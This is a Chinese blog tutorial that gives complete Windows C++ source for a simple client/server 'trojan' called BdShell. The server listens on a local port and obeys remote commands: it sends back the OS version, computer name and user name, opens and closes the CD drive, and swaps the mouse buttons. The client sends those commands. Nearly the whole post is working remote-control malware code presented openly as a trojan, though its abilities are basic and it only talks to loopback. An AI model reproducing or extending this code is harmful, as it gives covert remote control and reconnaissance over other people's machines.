实现一个c/s模式的简单木马

版权声明:本文为博主原创文章,转载请注明出处。 https://blog.csdn.net/u012319493/article/details/50397263

服务器:

#include "iostream"
#include "winsock2.h"
#include "string.h"
#pragma comment (lib, "ws2_32")
#pragma comment(lib, "Winmm.lib ") 
using namespace std;

#define HELPMSG "help - Show help menu \n"\
                 "getsysinfo - Get system information \n"\
                 "open - Open the CDRom \n"\
                 "close - Close the CDRom \n"\
                 "swap - Swap mouse button \n"\
                 "restore - Restore mouse button \n"\
                 "exit - Quit Bdshell\n"

//保存获得的系统信息
typedef struct _SYS_INFO
{
    OSVERSIONINFO OsVer;  //保存操作系统信息
    char szComputerName[MAXBYTE];  //保存计算机名
    char szUserName[MAXBYTE];  //保存当前登录名
}_SYS_INFO, *PSYS_INFO;

//获取系统的相关信息
void GetSysInfo(_SYS_INFO &sys)
{
    unsigned long nSize = MAXBYTE;
    sys.OsVer.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);  //结构体大小
    GetVersionEx(&sys.OsVer);  //获得操作系统版本

    GetComputerName(sys.szComputerName, &nSize);  //获取计算机名称

    nSize = MAXBYTE;
    GetUserName(sys.szUserName, &nSize);  //获取当前用户名称
}


//对命令进行判断和比较
bool Dispatch(SOCKET sock, char *szCmd)
{
    bool bRet = false;

    //根据不同的命令,完成不同的功能
    if(!strcmp(szCmd, "help"))
    {
        send(sock, HELPMSG, strlen(HELPMSG)+sizeof(char), 0);
        bRet = true;
    }
    //获取系统信息
    else if(!strcmp(szCmd, "getsysinfo"))
    {
        _SYS_INFO sysInfo;
        GetSysInfo(sysInfo);
        send(sock, (const char *)&sysInfo, sizeof(_SYS_INFO), 0);
        bRet = true;
    }
    //打开光驱
    else if(!strcmp(szCmd, "open"))
    {
        mciSendString("set cdaudio door open", NULL, NULL, NULL);
        bRet = true;
    }
    //关闭光驱
    else if(!strcmp(szCmd, "close"))
    {
        mciSendString("set cdaudio door closed", NULL, NULL, NULL);
        bRet = true;
    }
    //交换鼠标左右键功能
    else if(!strcmp(szCmd, "swap"))
    {
        SwapMouseButton(true);
        bRet = true;
    }
    //恢复鼠标左右键功能
    else if(!strcmp(szCmd, "restore"))
    {
        SwapMouseButton(false);
        bRet = true;
    }
    else
    {
        bRet = false;
    }
    return bRet;
}

int main()
{
    WSADATA wsaData;
    WSAStartup(MAKEWORD(2, 2), &wsaData);  //初始化ws2_32.dll动态库连接

    SOCKET s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);

    sockaddr_in sockaddr;
    sockaddr.sin_family = PF_INET;
    sockaddr.sin_addr.S_un.S_addr = inet_addr("127.0.0.1"); //IP地址,将IP转换为unsigned long型数值
    sockaddr.sin_port = htons(827); //端口号,本地字节顺序转换为网络字节顺序

    bind(s, (SOCKADDR*)&sockaddr, sizeof(SOCKADDR));

    listen(s, 1);


    SOCKADDR clientAddr;
    int nSize = sizeof(SOCKADDR);
    SOCKET clientSock;
    //从处于监听状态的流套接字的客户端请求队列中取出第一个请求,并创建一个新的套接字与客户端进行通信
    clientSock = accept(s, (SOCKADDR *)&clientAddr, &nSize); 

    while(true)
    {
        //发送一个命令提示
        send(clientSock, "\nBdShell>>", strlen("\nBdShell>>")+sizeof(char), 0);

        char buff[MAXBYTE] = {0};

        //接收客户端发来的命令
        recv(clientSock, buff, MAXBYTE, 0);
        if(!strcmp(buff, "exit"))
            break;

        //分发命令
        bool bRet = Dispatch(clientSock, buff);
        if(bRet == false)
            send(clientSock, "Command Unsuccessfuly!", strlen("Command Unsuccessfuly!")+sizeof(char), 0);
    }

    closesocket(clientSock);
    closesocket(s);

    WSACleanup();  //释放ws2_32.dll
    return 0;
}

客户端:

#include "winsock2.h"
#include "iostream"
#include "conio.h"

#pragma comment (lib, "ws2_32")

typedef struct _SYS_INFO
{
    OSVERSIONINFO OsVer;  //保存操作系统信息
    char szComputerName[MAXBYTE];  //保存计算机名
    char szUserName[MAXBYTE];  //保存当前登录名
}_SYS_INFO, *PSYS_INFO;

void showInfo(PSYS_INFO &sys)
{
    if(sys->OsVer.dwPlatformId == VER_PLATFORM_WIN32_NT) //平台ID
    {
        if(sys->OsVer.dwMajorVersion == 6 && sys->OsVer.dwMinorVersion == 1)
            printf("Win7 %s\n", sys->OsVer.szCSDVersion);  //补丁包
        else if(sys->OsVer.dwMajorVersion==5 && sys->OsVer.dwMinorVersion==2)
            printf("Windows 2003 \n");
        else if(sys->OsVer.dwMajorVersion == 5 && sys->OsVer.dwMinorVersion == 1) //主版本号,次版本号
            printf("Windows XP %s \r\n", sys->OsVer.szCSDVersion);  
        else if(sys->OsVer.dwMajorVersion == 5 && sys->OsVer.dwMinorVersion == 0)
            printf("Windows 2000 \r\n");
        else
            printf("Windows other\n");
    }
    else
        printf("Other System \r\n");

    printf("Computer name is %s \r\n", sys->szComputerName);

    printf("User name is %s\n", sys->szUserName);
}

int main()
{
    WSADATA wsaData;
    WSAStartup(MAKEWORD(2, 2), &wsaData);

    SOCKET ClientSock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);

    sockaddr_in ServerAddr;
    ServerAddr.sin_family = PF_INET;
    ServerAddr.sin_addr.S_un.S_addr = inet_addr("127.0.0.1");
    ServerAddr.sin_port = htons(827);

    connect(ClientSock, (SOCKADDR*)&ServerAddr, sizeof(SOCKADDR));

    while(true)
    {
        char buff[MAXBYTE] = {0};
        char Cmd[MAXBYTE] = {0};

        recv(ClientSock, buff, MAXBYTE, 0);
        printf("%s", buff);

        scanf("%s", Cmd);
        send(ClientSock, Cmd, MAXBYTE, 0);
        if(!strcmp(Cmd, "exit"))
        {
            printf("Login out!\n");
            break;
        }

        memset(buff, 0, MAXBYTE);
        recv(ClientSock, buff, MAXBYTE, 0);

        if(!strcmp(Cmd, "getsysinfo"))
        {
            PSYS_INFO SysInfo = (PSYS_INFO)buff;
            showInfo(SysInfo);
        }
        else
            printf("%s", buff);
    }

    getch();
    WSACleanup();
    return 0;
}

服务器:

客户端:
这里写图片描述

阅读更多
换一批

没有更多推荐了,返回首页